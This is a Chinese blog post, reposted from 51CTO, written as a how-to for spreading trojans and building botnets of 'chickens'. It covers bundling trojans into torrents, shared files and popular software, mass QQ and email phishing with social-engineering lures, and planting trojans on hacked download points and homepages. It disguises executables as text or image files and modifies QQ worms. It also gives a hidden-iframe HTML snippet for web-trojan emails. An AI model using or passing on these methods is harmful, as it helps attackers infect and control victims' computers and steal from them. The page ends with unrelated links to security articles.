几种常用的传播木马的方法

本文涉及的产品
密钥管理服务KMS,1000个密钥,100个凭据,1个月
简介:

一.目前流行木马传播技术.

1.用BT制作木马种子

利用BT制作木马种子的教程网上也发布了很多,这里主要找一款具有诱惑性的软件

然后捆绑上自己的木马,做成种子,最后发布出去.相信利用BT抓鸡速度可是超快哦.

2.利用PP共享自己捆了木马的软件或电影.

方法同BT一样,要找诱惑性电影或软件,捆上自己的木马,然后共享自己的目录,这样人

家就会通过搜索找到你的软件或电影.这里电影要配合网页木马.可以参看RealOnePla

ye木马制作.在黑白网络可以找到.当你一打开我们的电影时就会打开我们制作过的网页木

马.这样看电影也会中我们的马.

3.利用QQ邮箱传播木马.

这里主要点HTML格式----在里面写上以下这段代码:

<body > </body>

当人家一打开你发过去的邮件时,就会中我们的木马.

4.QQ群发网页木马。 
首先,你要申请多个QQ号,然后找款QQ消息群发器(黑鹰网站可以找到大量相关QQ群

发信息软件,)再然后要加上非常具有诱惑性的消息(肉鸡的多与少与这个直接相关

,),骗取人家点你的网址。最后,在晚上时可以挂在电脑上群发带有网页木马的信

息。相信只要你的信息够诱惑,肉鸡也是成群的。

5.利用163邮箱传播网页木马。

同样,这里用HTML格式,然后填上以下代码:

</html><iframe src="你的网页木马地址" name="zhu" ;0" height="0"

frameborder="0">

对方只要一打开,就会中我们的网页木马。

这里发送邮件时注意一些技巧,我们要加入一些社会工程会。比如对方是爱好车的,

你就在邮件标题上写上关于车的诱惑性标题。目的只有一个,让他点我们带有网页木

马的邮件。

6.利用邮箱群发我们的网页木马。

这里要用到论坛邮箱提取器,这类工具黑鹰也有下载,大家可以找一下。提取大量

邮箱后,配合FOXMAIL这款软件进行群发传播带有网页木马的邮件。这里也要注意技

巧,比如在一个游戏论坛提取的邮箱,你就可以伪装本论坛发给广大游戏玩家,提供

最新游戏外挂下载.然后写上自己的网页木马.大部分都认为信息的真实性而点击.从

而中我们的木马. 这里还可以配合利用HTML格式群发我们的网页木马效果可更佳!

7.捆绑欺骗

这也是比较常用的传播木马技术.把木马捆在游戏,流行软件上,配合以上方法,QQ,邮

箱,BT,论坛,等发布捆了木马的软件.骗取点我们的软件,这样也就同时中了我们的木

马.关于捆绑技术,本人做了三个非常具体详细的语音动画教程.不懂的可以在黑鹰查

找本人的捆绑系列专辑教程.

8.攻破下载点,捆上木马放入下载点.

当我们入侵到一些网站时,看看是否开放21服务,也就是是否提供FTP服务.若入侵到

这类网站,恭喜你,你又可以得到大批量肉鸡.你可以捆上自己的木马然后放入下载点

等待人家上钩吧!该方法抓鸡的速度也非常快.

9.钓鱼式欺骗别人点击你的网页木马地址或木马.

钓鱼式欺骗攻击,也是国内最新发现的一种攻击手法.主要利用社会工程会中的信任

关系骗他点击.具体的利用方法:当盗了人家的QQ号,你可以看看有几个群,然后在群里

放上自己捆绑的木马.接着在群里发几条诱惑性的信息,比如最新申请6位QQ号软件,

由于是在同一个群,可能他们对该QQ号主人有一定的信任度,所以点击的可能性一定

很大.若该QQ号主人是群主或是管理员,哈哈,我们来个更毒的,干脆在公告上写上自己

的网页木马地址,然后说本群刚建的专用网站!由于是群主,他们对他的信任度可想而

知.应该都会点的吧!还有一招,在他QQ的个人资料上或个人签名上填上自己的网页木

马,然后说刚建的个人网站.相信很多好友都会自动点击吧!

10.网站主页挂马

这个应该不用具体介绍吧,教程有N多.入侵到一个网站得到WEBSHELL后,接下来大家

是不是都忙着找首页挂马了.

11.论坛漏洞挂马

这里主要利用论坛的一些漏洞进行挂马,比如最近的动网前台提升管理员,然后挂马,

动网的个人资料过虑不严挂马,还有投票挂马等等.利用这些漏洞进行挂马.也有相关

教程,不是很清楚的可以在黑鹰找到.

12.文件类型伪装

这里主要把一些木马服务端和一些文本文件捆绑在一起,然后通后自解压方式或捆绑

器制作成文本文件类型的可执行文件.但他以为打开一个文本文件时,虽然能正常运行

文本文件,其实已经中了我们的木马.真是神不知鬼不觉!本人也做过文件类型欺骗的

动画教程.不是很清楚的也可以在黑鹰或动画吧找到本人的相关的教程.当然,还要以

伪装成其它的类型,比如把木马制作成BMP图片.BAT格式等.只要他一运行就会中

我们的马.

14.其它的传播技术:比如制作图片木马,也有专门的图片木马制作工具,RM木马制作

黑鹰也有相关教程,RealOnePlayer木马制作,FLASH木马制作.也有专门的制作工具,

网上可以找到相关工具.这些也是比较常用的传播技术.只要你有这方面的思路,都可

以在网上找到相关资料,自己尝试制作.

 

二.新型高级木马传播技术

下面介绍几种比较高级的木马传播技术.由于有一定的技术难度,所以隐蔽性比较强,

传播速度也快,而且也几乎不会被杀毒软件查杀.

1.在WORD文档中加入木马文件

这种方法非常隐蔽,在WORD文档尾加入木马文件,只要别人点击这个所谓的WORD文件就

会中木马,这种方法主要是通过把一个EXE格式的木马文件接在一个DOC文件的末尾,使

别人察觉不到木马的存在,因此使之上当受骗.具体实现方法,比较复杂.本人也在进一

步的研究之中.相信在不久这种方法就会流行起来.现在主要被一些高手使用.

2.黑客工具绑木马

其实这本来算不上高级的方法,但最近发现很多黑客软件发布站,捆了木马的工具躲过

管理员的检测.照样发布出来,想像危害性有多大.其实他们就是利用人性的弱点.黑客

工具本来被杀毒软件查杀,捆了木马的工具被查杀就不觉得奇怪了.就会放松警惕.从

而被他们利用.这一招是他们把黑客中的社会工程学利用的"恰到好处"!

3.用Z-file伪装加密木马程序

z-file伪装加密软件是台湾华顺科技产品,其经过将文件压缩加密之后,再以bmp图像

文件格式显示出来,扩展名是bmp,执行后是幅普通的图像.黑客会将木马程序和小游戏

合拼,再用z-file加密及将此"混合体"发给受害者,由于看上去是图像文件,受害者往

往不以为然,打开后又只是一般的图片,最可怕的地方还在于就连杀毒软件也检测不出

它内藏木马.

4.伪装成应用程序扩展组件

此类属于最难识别的特洛伊木马,也是骗术最高的木马,当然技术实现也有相当的难度

由于涉及到编程,所以我这里只简单介绍原理,以供参考.

采用内核插入式的嵌入方式,利用远程插入线程技术,嵌入DLL线程,或者挂接PSAPI,实

现木马程序的隐藏.

5.通过QQ病毒,QQ蠕虫,QQ尾巴或邮箱病毒,蠕虫进行传播.

相信利用这些技术进行传播木马的速度是最快的.这里要下载病毒,蠕虫源代码.进行

分析.修改.加入我们的网页木马地址.然后传播到网上,这样就会一传十,十传百,指数

级上升,自动为我们传播木马.这种传播速度是惊人的.网上也可找到相关QQ蠕虫制作

器,菜鸟朋友就可以直接制作自己的带有网页木马的蠕虫了.最近的唐山黑客就是利用

QQ尾巴传播自己的木马,感染并操控了四万多台民用电脑.进行对北京的一家音乐网站

进行分布式DDOS攻击.利用该技术是相当高级的,速度也是最快的.

本文转自成功不仅是个人荣誉,更是对家人责任博客51CTO博客,原文链接http://blog.51cto.com/hukunlin/250487如需转载请自行联系原作者


kunlin_hu

相关文章
|
云安全 域名解析 安全
警惕主动外联!云防火墙检测拦截勒索、Muhstik僵尸网络等 Log4j2漏洞利用
近期,阿里云安全观测到,在 Apache Log4j2 漏洞攻击全程中,无论是在漏洞利用阶段,还是后续要进行验证和进一步的控制利用,大多涉及多次受害服务器的主动外联,云防火墙已陆续发现并拦截60余万次涉及勒索、挖矿家族的漏洞利用行为。
979 0
警惕主动外联!云防火墙检测拦截勒索、Muhstik僵尸网络等 Log4j2漏洞利用
|
存储 安全 网络安全
2023年多个变种传播的mkp勒索病毒数据怎么处理|数据解密恢复
        恶意软件是当今互联网上最常见的威胁之一,尤其是勒索病毒。[MyFile@waifu.club].mkp勒索病毒、[datastore@cyberfear.com].mkp勒索病毒、[savetime@cyberfear.com].mkp勒索病毒、[torres@proxy.tg].mkp勒索病毒勒索病毒是2023年最新的makop变种勒索病毒,它能够对企业的服务器数据及各种软件数据库进行加密,使得企业的服务器无法正常运行。91数据恢复研究院将介绍.mkp勒索病毒的特征、影响以及如何进行数据恢复。
2023年多个变种传播的mkp勒索病毒数据怎么处理|数据解密恢复
|
安全 API Windows
恶意病毒逆向分析实验1
恶意病毒逆向分析
|
云安全 监控 安全
攻击者使用showDoc的漏洞传播僵尸网络
近日,阿里云安全团队基于威胁情报挖掘网络攻击日志的过程中,发现了使用showDoc漏洞传播僵尸网络和挖矿软件的攻击事件,使用该手法传播僵尸网络暂未被公开报告过。
1416 0
攻击者使用showDoc的漏洞传播僵尸网络
|
SQL 安全 Java
服务器被黑该如何查找入侵、攻击痕迹
当公司的网站服务器被黑,被入侵导致整个网站,以及业务系统瘫痪,给企业带来的损失无法估量,但是当发生服务器被攻击的情况,作为服务器的维护人员应当在第一时间做好安全响应,对服务器以及网站应以最快的时间恢复正常运行,让损失减少到最低,针对于黑客攻击的痕迹应该如何去查找溯源,还原服务器被攻击的现场,SINE安全公司制定了详细的服务器被黑自查方案。
1054 0
服务器被黑该如何查找入侵、攻击痕迹
|
人工智能 监控 安全
僵尸网络常见攻击方式曝光,第二种威胁最大
僵尸网络常见攻击方式曝光,第二种威胁最大
|
安全
金山毒霸:极虎继续发威 病毒借兽兽门大肆传播
春节长假后的第一周,一连串的病毒纷至沓来,极虎、隐身猫、僵尸网络等等,威胁着广大网民的网络财产安全。金山安全实验室最新监测数据显示,年前爆发的”极虎”病毒在春节后依旧很活跃,日均感染量不断上升;而另一个名为”隐身猫”的病毒,目前累计感染量仅为14190台,危害范围比较小,而且类似金山毒霸等专业杀毒软件均可进行查杀,用户无需过分担心。
1487 0
|
安全 数据安全/隐私保护 内存技术